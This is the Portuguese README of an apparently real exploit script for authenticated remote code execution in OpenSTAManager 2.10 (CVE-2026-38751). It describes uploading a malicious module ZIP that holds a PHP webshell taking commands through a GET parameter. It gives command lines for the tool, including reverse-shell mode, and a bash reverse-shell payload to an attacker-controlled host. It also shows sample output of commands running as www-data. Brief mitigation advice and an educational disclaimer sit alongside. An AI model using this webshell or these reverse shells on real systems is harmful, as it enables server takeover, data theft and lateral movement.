Exploit RCE do OpenSTAManager (CVE-2026-38751)
Visão Geral
Este script Python explora uma vulnerabilidade de Execução Remota de Código no OpenSTAManager versão 2.10, identificada como CVE-2026-38751. O exploit permite que usuários autenticados carreguem um módulo malicioso e executem comandos arbitrários no sistema alvo.
Detalhes da Vulnerabilidade
- CVE ID: CVE-2026-38751
- Produto: OpenSTAManager
- Versão: 2.10
- Tipo: Execução Remota de Código (RCE)
- Vetor de Ataque: Baseado na web, requer autenticação válida
Como o Exploit Funciona
O exploit segue os seguintes passos:
- Autenticação: Faz login no aplicativo OpenSTAManager usando as credenciais fornecidas
- Habilitar Atualizações: Ativa a funcionalidade de atualização de módulos, necessária para o exploit
- Criar ZIP Malicioso: Gera um arquivo ZIP contendo:
- Um arquivo de definição de módulo (
MODULE)
- Um script PHP shell (
shell.php) que executa comandos via parâmetro GET c
- Carregar Módulo: Envia o ZIP malicioso através da interface de atualização de módulos
- Verificar Exploração: Confirma que o shell está acessível e funcional
- Executar Comandos: Ou:
- Modo shell interativo para execução manual de comandos
- Conexão reverse shell para estabelecer uma conexão persistente
Pré-requisitos
- Python 3.x
- Pacotes Python necessários:
requests, zipfile
- Credenciais de administrador válidas para o OpenSTAManager
- Acesso de rede ao sistema alvo
Uso
Uso Básico
python3 exploit.py -u http://target.com -U admin -P password
Modo Shell Interativo
python3 exploit.py -u http://target.com -U admin -P password --interactive
Modo Reverse Shell
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
Argumentos
| Argumento | Descrição |
|---|
-u, --url | URL alvo (obrigatório) |
-U, --user | Nome de usuário para autenticação (obrigatório) |
-P, --password | Senha para autenticação (obrigatório) |
--interactive | Entrar no modo shell interativo |
--no-cleanup | Não remover arquivos shell após a execução |
--lhost | Host local para reverse shell |
--lport | Porta local para reverse shell |
Detalhes Técnicos
Processo de Exploração
- Autenticação: O script realiza uma requisição de login ao endpoint de autenticação do aplicativo
- Habilitação de Atualização de Módulos: Envia uma requisição POST para habilitar a funcionalidade de atualização de módulos
- Geração do ZIP: Cria um arquivo ZIP com:
shell/MODULE: Arquivo de configuração do módulo
shell/shell.php: Webshell PHP que executa comandos passados via parâmetro GET c
- Processo de Upload: Usa dados de formulário multipart para enviar o ZIP malicioso ao endpoint de atualização de módulos
- Verificação: Testa o shell enviado executando um comando simples como
id para confirmar seu funcionamento
- Execução de Comandos: Fornece um shell interativo ou estabelece uma conexão reverse shell
Payloads Utilizados
O exploit tenta múltiplos payloads de reverse shell:
- Shell reverso Bash:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
- Shells reversos em Python usando conexões socket
- Payload bash codificado em Base64
- Shell reverso Netcat
Considerações de Segurança
⚠️ Aviso: Este exploit é destinado apenas para fins educacionais e de testes de segurança autorizados.
Avaliação de Riscos
Esta vulnerabilidade permite:
- Execução arbitrária de código como o usuário do servidor web
- Potencial escalada de privilégios
- Acesso a dados sensíveis armazenados no sistema
- Possível movimento lateral dentro de uma rede
Mitigação
Para se proteger contra esta vulnerabilidade:
- Atualize o OpenSTAManager para a versão mais recente
- Implemente controles de autenticação adequados
- Restrinja as capacidades de upload de arquivos
- Monitore atividades suspeitas
- Aplique segmentação de rede
Exemplo de Saída
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
Referências
Licença
Este exploit é fornecido apenas para fins educacionais. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal.